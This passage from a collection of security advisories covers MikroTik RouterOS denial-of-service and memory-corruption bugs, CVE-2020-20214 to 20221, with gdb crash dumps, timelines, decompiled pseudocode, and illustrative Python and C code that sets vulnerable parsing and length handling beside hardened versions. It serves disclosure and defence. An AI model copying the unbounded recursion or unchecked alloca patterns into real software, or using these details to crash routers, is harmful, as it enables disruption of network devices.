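    if pos >= len(tokens) or tokens[pos] != closer:
        raise ValueError(f"expected {closer!r} at token {pos}")
    return node, pos + 1


def _parse(text, max_depth):
    tokens = tokenize(text)
    node, end = _parse_container(tokens, 0, 1, max_depth)
    if end != len(tokens):
        raise ValueError("trailing data after message")
    return node


def parse_unbounded(text):
    """Vulnerable shape: no limit, so a deep message exhausts the stack
    (RecursionError here; SIGSEGV in the native parsers the advisories describe)."""
    return _parse(text, None)


def parse_bounded(text, max_depth=MAX_DEPTH):
    """Hardened shape: the same parser, but it stops with DepthExceeded at the limit."""
    return _parse(text, max_depth)


def outcome(parser, text):
    """Return 'ok' or the exception class name, so the two parsers can be compared."""
    try:
        parser(text)
        return "ok"
    except (RecursionError, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    shallow = build_nested_message(10)
    deep = build_nested_message(2000)  # same depth as the advisory's snippet
    print("shallow, bounded: ", outcome(parse_bounded, shallow))
    print("deep, unbounded:  ", outcome(parse_unbounded, deep))
    print("deep, bounded:    ", outcome(parse_bounded, deep))
```

The comparison makes one point that a request size limit alone misses: the 2000-level message is only about 12 KB, well within any reasonable body limit, yet it costs the unbounded parser 2003 frames. The limit has to be on nesting depth and has to live in the parser itself, checked before it descends; the bounded variant rejects the same input after 65 frames with an error the caller can log and count, instead of a crash that takes the process (or, per the advisories, the whole router) with it.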
#### Timeline

+ 2019/09/16 - reported the vulnerability to the vendor
+ 2019/09/17 - vendor confirmed the vulnerability and will fix it as soon as possible
+ 2020/06/02 - vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20214/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20214

#### Description

The `btest` process suffers from an assertion failure vulnerability: there is a reachable assertion in the `btest` process. By sending a crafted packet, an authenticated remote user can crash the `btest` process through that assertion failure.

Against stable `6.46.5`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGABRT, Aborted.
=> 0x7772255b : pop ebx
   0x7772255c : cmp eax,0xfffff000
   0x77722561 : jbe 0x77722571
   0x77722563 : mov edx,DWORD PTR [ebx-0x34]
0x7772255b in raise () from target:/lib/libc.so.0
(gdb) info inferiors
  Num  Description       Executable
* 1    process 271       target:/nova/bin/btest
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: /nova/bin/btest
2020.06.19-15:51:36.94@0: --- signal=6 --------------------------------------------
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: eip=0x7772255b eflags=0x00000246
2020.06.19-15:51:36.94@0: edi=0x00fe0001 esi=0x7772a200 ebp=0x7fdcf880 esp=0x7fdcf878
2020.06.19-15:51:36.94@0: eax=0x00000000 ebx=0x0000010f ecx=0x0000010f edx=0x00000006
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: maps:
2020.06.19-15:51:36.94@0: 08048000-08057000 r-xp 00000000 00:0c 1006 /nova/bin/btest
2020.06.19-15:51:36.94@0: 776f4000-77729000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0: 7772d000-77747000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-15:51:36.94@0: 77748000-77757000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.19-15:51:36.94@0: 77758000-77775000 r-xp 00000000 00:0c 947 /lib/libucrypto.so
2020.06.19-15:51:36.94@0: 77776000-777c2000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.19-15:51:36.94@0: 777c8000-777cf000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: stack: 0x7fdd0000 - 0x7fdcf878
2020.06.19-15:51:36.94@0: 00 a0 72 77 00 a0 72 77 b8 f8 dc 7f 77 e0 71 77 06 00 00 00 00 a2 72 77 20 00 00 00 00 00 00 00
2020.06.19-15:51:36.94@0: 16 00 00 00 18 f9 dc 7f b4 f8 dc 7f e4 2a 7c 77 01 00 00 00 e4 2a 7c 77 16 00 00 00 01 00 fe 00
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: code: 0x7772255b
2020.06.19-15:51:36.94@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.5`, and it seems that the latest stable version, `6.48.2`, still suffers from this vulnerability.

#### Timeline

+ 2019/10/21 - reported the vulnerability to the vendor
+ 2019/10/21 - vendor confirmed the vulnerability and will fix it as soon as possible
+ 2020/06/02 - still no fix
+ 2021/05/04 - CVE assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20215/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20215

#### Description

The `diskd` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `diskd` process through an invalid memory access.
Against stable `6.46.3`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x776cd1db <_ZN6string6assignERKS_+21>: mov eax,DWORD PTR [eax]
   0x776cd1dd <_ZN6string6assignERKS_+23>: mov edx,DWORD PTR [eax]
   0x776cd1df <_ZN6string6assignERKS_+25>: add edx,eax
   0x776cd1e1 <_ZN6string6assignERKS_+27>: add edx,0x4
0x776cd1db in string::assign(string const&) () from target:/lib/libuc++.so
(gdb) i r
eax            0x1b                27
ecx            0x776d54ec          2003653868
edx            0x20fe0010          553517072
ebx            0x776d54ec          2003653868
esp            0x7fd40b6c          0x7fd40b6c
ebp            0x7fd40b78          0x7fd40b78
esi            0x8056790           134571920
edi            0x8056760           134571872
eip            0x776cd1db          0x776cd1db
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 264       target:/nova/bin/diskd
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: /nova/bin/diskd
2020.06.04-14:18:22.55@0: --- signal=11 --------------------------------------------
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78 esp=0x7fd40b6c
2020.06.04-14:18:22.55@0: eax=0x0000001b ebx=0x776d54ec ecx=0x776d54ec edx=0x20fe0010
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: maps:
2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00000000 00:0c 1131 /nova/bin/diskd
2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00000000 00:0c 996 /lib/libuClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00000000 00:0c 992 /lib/libgcc_s.so.1
2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00000000 00:0c 976 /lib/libuc++.so
2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00000000 00:0c 982 /lib/libubox.so
2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp 00000000 00:0c 978 /lib/libumsg.so
2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp 00000000 00:0c 990 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20
2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: code: 0x776cd1db
2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.5` and was fixed in stable `6.47`.

#### Timeline

+ 2019/10/21 - reported the vulnerability to the vendor
+ 2019/10/21 - vendor confirmed the vulnerability and will fix it as soon as possible
+ 2020/06/02 - vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20216/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20216

#### Description

The `graphing` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `graphing` process through a NULL pointer dereference.

Against stable `6.46.5`, the PoC resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x80521e2:    call   DWORD PTR [ecx+0x4]
   0x80521e5:    add    esp,0x18
   0x80521e8:    push   0x5c
   0x80521ea:    push   ebx
0x080521e2 in ?? ()
(gdb) i r
eax            0x8061db8           134618552
ecx            0x0                 0
edx            0x8061ce8           134618344
ebx            0x7fa8ad0c          2141760780
esp            0x7fa8acb0          0x7fa8acb0
ebp            0x7fa8acd8          0x7fa8acd8
esi            0x8061cb8           134618296
edi            0x80610a0           134615200
eip            0x80521e2           0x80521e2
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 196       target:/nova/bin/graphing
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: /nova/bin/graphing
2020.06.04-15:12:41.47@0: --- signal=11 --------------------------------------------
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202
2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 ebp=0x7fa8acd8 esp=0x7fa8acb0
2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c ecx=0x00000000 edx=0x08061ce8
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: maps:
2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp 00000000 00:0c 1038 /nova/bin/graphing
2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7768a000-776a4000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:12:41.47@0: 776a5000-776b4000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-15:12:41.47@0: 776b5000-776bd000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-15:12:41.47@0: 776be000-7770a000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-15:12:41.47@0: 7770d000-77717000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7771c000-77723000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: stack: 0x7fa8b000 - 0x7fa8acb0
2020.06.04-15:12:41.47@0: e8 1c 06 08 b8 1d 06 08 00 00 00 00 01 00 00 00 0c ad a8 7f 5b 00 00 00 b8 98 05 08 b8 98 05 08
2020.06.04-15:12:41.47@0: f0 da 6b 77 0c ad a8 7f 28 ad a8 7f 3a bc 6b 77 b8 1c 06 08 0c ad a8 7f 05 00 00 00 a0 10 06 08
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: code: 0x80521e2
2020.06.04-15:12:41.47@0: ff 51 04 83 c4 18 6a 5c 53 e8 a0 9c ff ff 8b 56
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2019/12/02 - reported the vulnerability to the vendor
+ 2020/06/02 - vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20217/README.md:

### CVE-2020-20217

#### Description

The `route` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause high CPU load, which may make the device respond slowly or stop responding altogether.

Against stable `6.46.3`, the PoC resulted in high CPU load on the device.

![route_high_cpu_load](./images/route_high_cpu_load.png)

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2019/12/02 - reported the vulnerability to the vendor
+ 2019/12/03 - vendor reproduced and confirmed the vulnerability
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20217/images/route_high_cpu_load.png: https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20217/images/route_high_cpu_load.png

---

/advisory/MikroTik/CVE-2020-20218/README.md:

### CVE-2020-20218

#### Description

The `traceroute` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `traceroute` process, because the count of the loop operation is controllable by the sender.

Against stable `6.46.3`, the PoC resulted in the following crash, captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x804da3e:    rep stos BYTE PTR es:[edi],al
   0x804da40:    jne    0x804da81
   0x804da42:    mov    eax,DWORD PTR [ebx+0x50]
   0x804da45:    mov    ecx,DWORD PTR [ebx+0x4]
0x0804da3e in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0xfdffd1            16646097    <=== controllable
edx            0x7e9df530          2124281136
ebx            0x8052848           134555720
esp            0x7e9df530          0x7e9df530
ebp            0x7f9bf5c8          0x7f9bf5c8
esi            0x7e9df538          2124281144
edi            0x7e9df538          2124281144
eip            0x804da3e           0x804da3e
eflags         0x10297             [ CF PF AF SF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 455       target:/nova/bin/traceroute
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.05.16-21:51:49.43@0:
2020.05.16-21:51:49.43@0:
2020.05.16-21:51:49.43@0: /nova/bin/traceroute
2020.05.16-21:51:49.43@0: --- signal=11 --------------------------------------------
2020.05.16-21:51:49.43@0:
2020.05.16-21:51:49.43@0: eip=0x0804da3e eflags=0x00010297
2020.05.16-21:51:49.43@0: edi=0x7e9df538 esi=0x7e9df538 ebp=0x7f9bf5c8 esp=0x7e9df530
2020.05.16-21:51:49.43@0: eax=0x00000000 ebx=0x08052848 ecx=0x00fdffd1 edx=0x7e9df530
2020.05.16-21:51:49.43@0:
2020.05.16-21:51:49.43@0: maps:
2020.05.16-21:51:49.43@0: 08048000-0804f000 r-xp 00000000 00:0c 1007 /nova/bin/traceroute
2020.05.16-21:51:49.43@0: 77705000-7773a000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.05.16-21:51:49.43@0: 7773e000-77758000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.05.16-21:51:49.43@0: 77759000-77768000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.05.16-21:51:49.43@0: 77769000-77773000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so
2020.05.16-21:51:49.43@0: 77775000-777c1000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.05.16-21:51:49.43@0: 777c7000-777ce000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.05.16-21:51:49.43@0:
2020.05.16-21:51:49.43@0: stack: 0x7f9c0000 - 0x7e9df530
```

#### Details

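The following C program is an added example, not code from the advisory or from RouterOS. It models the length handling analysed in this section (a 32-bit value from the request minus a 20- or 40-byte header, gated only by a signed `> 7` comparison, then fed to `alloca()` and `memset()`) and puts a bounded check beside it. The header sizes, the crash value `0x00fdffd1` and the shape of the allocation follow the text; `MAX_PAYLOAD` and the helper names are assumptions.

```c
/* Added example modelling CVE-2020-20218's length handling.
 * Sizes and names are constructed; MAX_PAYLOAD is a hypothetical cap. */
#include <alloca.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPV4_HDR_LEN 20u
#define IPV6_HDR_LEN 40u
#define MIN_PAYLOAD   8u      /* the original only requires `> 7` */
#define MAX_PAYLOAD 1500u     /* hypothetical cap: one MTU-sized probe */

/* Mirrors step (2): the header length is subtracted from the 32-bit field
 * and stored in a signed 32-bit slot ([v3 + 0x3C]). The subtraction wraps. */
static int32_t payload_len_unchecked(uint32_t packet_size, bool is_ipv4)
{
    uint32_t hdr = is_ipv4 ? IPV4_HDR_LEN : IPV6_HDR_LEN;
    return (int32_t)(packet_size - hdr);
}

/* Mirrors the gate at (3): a signed `> 7` comparison. Returns true when the
 * value would flow on to alloca(). Wrapped (negative) values are rejected,
 * but every large positive value is accepted. */
static bool original_gate_passes(uint32_t packet_size, bool is_ipv4)
{
    return payload_len_unchecked(packet_size, is_ipv4) > 7;
}

/* Hardened replacement: reject underflow before subtracting and enforce an
 * upper bound so the stack allocation stays small. */
static bool hardened_payload_len(uint32_t packet_size, bool is_ipv4,
                                 uint32_t *out_len)
{
    uint32_t hdr = is_ipv4 ? IPV4_HDR_LEN : IPV6_HDR_LEN;
    if (packet_size < hdr + MIN_PAYLOAD)   /* too small, or would wrap */
        return false;
    uint32_t len = packet_size - hdr;
    if (len > MAX_PAYLOAD)                 /* would push the stack into other mappings */
        return false;
    *out_len = len;
    return true;
}

/* Hardened counterpart of sub_804D892(): the allocation at (6) and the
 * memset() at (7) keep their shape but run only after the bound check.
 * Returns the payload length used, or -1 when the request is rejected. */
static int build_probe(uint32_t packet_size, bool is_ipv4)
{
    uint32_t len;
    if (!hardened_payload_len(packet_size, is_ipv4, &len))
        return -1;
    uint8_t *buf = alloca(len);            /* now at most MAX_PAYLOAD bytes */
    memset(buf + 8, 0, len - 8);           /* as at (7): &v33 = v12 + 8, size v11 - 8 */
    buf[0] = 0x45;                         /* stand-in for filling the header */
    return (int)len;
}

int main(void)
{
    /* Constructed inputs: the value seen in ecx at the crash (0x00fdffd1)
     * plus an IPv4 header, and an ordinary 100-byte request. */
    uint32_t oversized = 0x00fdffd1u + IPV4_HDR_LEN;
    uint32_t benign = 100u;

    printf("oversized: original gate %s, hardened result %d\n",
           original_gate_passes(oversized, true) ? "passes" : "blocks",
           build_probe(oversized, true));
    printf("benign:    original gate %s, hardened result %d\n",
           original_gate_passes(benign, true) ? "passes" : "blocks",
           build_probe(benign, true));
    return 0;
}
```
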
The vulnerability can be triggered by sending a nova message to the default handler. In the default handler's vtable, `nv::Handler::handleCmd()` is overridden by `sub_804C820()`.

In `sub_804C820()`, if `a3` equals `0xfe000f`, the u32 field with id `5` is read from the message and saved at `(2)`. At `(3)` there is a signed comparison; if it is satisfied, the routine normally reaches `(4)`, where `sub_804D892()` is called.

```c++
// file: /nova/bin/traceroute in stable 6.46.3
int sub_804C820(nv::Looper *a1, nv::message *a2, unsigned int a3)
{
  if ( a3 == 0xFE000F )                        // (1) command id
  {
    /* ... */
    v3[19] = -1;
    v3[20] = 0;
    v3[21] = -1;
    /* ... */
    v3[19] = nv::message::get(a2, 15, v3[19]);
    v12 = nv::message::get(a2, 16, v3[21]);
    v3[21] = v12;
    if ( !v3[3] )
      v3[12] = 0;
    if ( nv::message::get(a2, 5, v12, v12) )   // u32 field id 5 is present in the message
    {
      v13 = IPAddr6::isIPv4(v28);
      if ( (_BYTE)v13 )
        v14 = nv::message::get(a2, 5, v13, v13) - 20;   // IPv4: strip 20-byte header
      else
        v14 = nv::message::get(a2, 5, v13, v13) - 40;   // IPv6: strip 40-byte header
      v3[15] = v14;                            // (2) [v3 + 0x3C] = v14, controllable
    }
    if ( v3[15] > 7 )                          // (3) signed comparison, no upper bound
    {
      if ( v3[19] )
      {
        v15 = v3[21];
        if ( v15 )
        {
          /* ... */
          if ( v3[2] >= 0 )
          {
            /* ... */
            sub_804D892((int)v3);              // (4)
            /* ... */

```

In `sub_804D892()`, the value saved at `a1 + 0x3c` is read into `v11` at `(5)`. This is exactly the value read earlier from the nova message, so it is controllable. At `(6)` `v11` is passed to `alloca()` to reserve stack space. Because this value is not properly validated, a large value makes the stack grow into library memory at `(6)`, and the subsequent `memset()` at `(7)` performs an invalid memory access.

```c++
void sub_804D892(int a1)
{
  /* ... */
  v11 = *(_DWORD *)(a1 + 0x3C);     // (5) the value stored at (2)
  v12 = alloca(v11);                // (6) controllable stack space allocation
  v13 = *(_DWORD *)(a1 + 12) == 1;
  memset(&v33, 0, v11 - 8);         // (7) &v33 = v12 + 8; faults once the stack overlaps library memory
  /* ... */
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.46.5`.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/01/08 - vendor confirmed the vulnerability and fixed it in the testing release tree
+ 2020/04/08 - vendor fixed it in stable `6.46.5`
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20219/README.md:

### CVE-2020-20219

#### Description

The `igmpproxy` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `igmpproxy` process due to a NULL pointer dereference.

Against stable `6.46.5`, the PoC resulted in the following crash, captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
=> 0x8050a8d:    mov    eax,DWORD PTR [ebx]
   0x8050a8f:    push   DWORD PTR [eax]
   0x8050a91:    push   0x1
   0x8050a93:    push   esi
0x08050a8d in ?? ()
(gdb) i r
eax            0x80581bc           134578620
ecx            0xb                 11
edx            0x0                 0
ebx            0x0                 0
esp            0x7fa9326c          0x7fa9326c
ebp            0x7fa932a8          0x7fa932a8
esi            0x7fa932b8          2141795000
edi            0x7fa9331c          2141795100
eip            0x8050a8d           0x8050a8d
eflags         0x10206             [ PF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 237       target:/ram/pckg/multicast/nova/bin/igmpproxy
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11 --------------------------------------------
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x00000000 ecx=0x0000000b edx=0x00000000
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00000000 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-77740000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-77777000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-17:44:27.12@0: 77778000-777c4000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/06/02 - vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20220/README.md:

### CVE-2020-20220

#### Description

The `bfd` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `bfd` process due to an invalid memory access.

Against stable `6.46.5`, the PoC resulted in the following crash, captured by `gdb`.

```shell
Thread 2.1 "bfd" received signal SIGSEGV, Segmentation fault.
=> 0x804b175:    inc    DWORD PTR ds:0x0
   0x804b17b:    add    esp,0x10
   0x804b17e:    leave
   0x804b17f:    ret
0x0804b175 in ?? ()
(gdb) i r
eax            0x8050634           134546996
ecx            0x8051274           134550132
edx            0x1                 1
ebx            0x77777af0          2004318960
esp            0x7f9d3e70          0x7f9d3e70
ebp            0x7f9d3e88          0x7f9d3e88
esi            0x8054298           134562456
edi            0x8054a90           134564496
eip            0x804b175           0x804b175
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
  1                      target:/ram/pckg/routing/nova/bin/bfd
* 2    process 306       target:/ram/pckg/routing/nova/bin/bfd
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: /ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: --- signal=11 --------------------------------------------
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: eip=0x0804b175 eflags=0x00010202
2020.06.19-18:36:13.88@0: edi=0x08054a90 esi=0x08054298 ebp=0x7f9d3e88 esp=0x7f9d3e70
2020.06.19-18:36:13.88@0: eax=0x08050634 ebx=0x77777af0 ecx=0x08051274 edx=0x00000001
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: maps:
2020.06.19-18:36:13.88@0: 08048000-08050000 r-xp 00000000 00:1b 16 /ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: 7759a000-7759c000 r-xp 00000000 00:0c 959 /lib/libdl-0.9.33.2.so
2020.06.19-18:36:13.88@0: 7759e000-775d3000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0: 775d7000-775f1000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-18:36:13.88@0: 775f2000-77601000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.19-18:36:13.88@0: 77602000-7775f000 r-xp 00000000 00:0c 954 /lib/libcrypto.so.1.0.0
2020.06.19-18:36:13.88@0: 7776f000-77777000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.19-18:36:13.88@0: 77778000-777c4000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.19-18:36:13.88@0: 777ca000-777d1000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: stack: 0x7f9d4000 - 0x7f9d3e70
2020.06.19-18:36:13.88@0: 34 06 05 08 d0 e6 04 08 d8 3e 9d 7f 90 4a 05 08 98 42 05 08 d8 3e 9d 7f f8 3e 9d 7f 6d 39 77 77
2020.06.19-18:36:13.88@0: 90 4a 05 08 28 40 9d 7f 05 00 00 00 00 43 05 08 00 00 00 00 28 90 7c 77 01 00 00 00 0c 00 00 00
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: code: 0x804b175
2020.06.19-18:36:13.88@0: ff 05 00 00 00 00 83 c4 10 c9 c3 55 89 e5 53 83
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and the latest stable version, `6.48.2`, still appears to be affected.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/01/07 - vendor confirmed the vulnerability and said it would work on a fix
+ 2021/05/04 - CVE was assigned

---

/advisory/MikroTik/CVE-2020-20221/README.md:

### CVE-2020-20221

#### Description

The `cerm` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause high CPU load, which may make the device respond slowly or stop responding altogether.

Against long-term `6.45.8`, the PoC resulted in high CPU load on the device.

![cerm_high_cpu_load](./images/cerm_high_cpu_load.png)

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed as of stable `6.46`.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/01/08 - vendor confirmed the vulnerability and fixed it as of stable `6.46`
+ 2021/05/04 - CVE was assigned

---

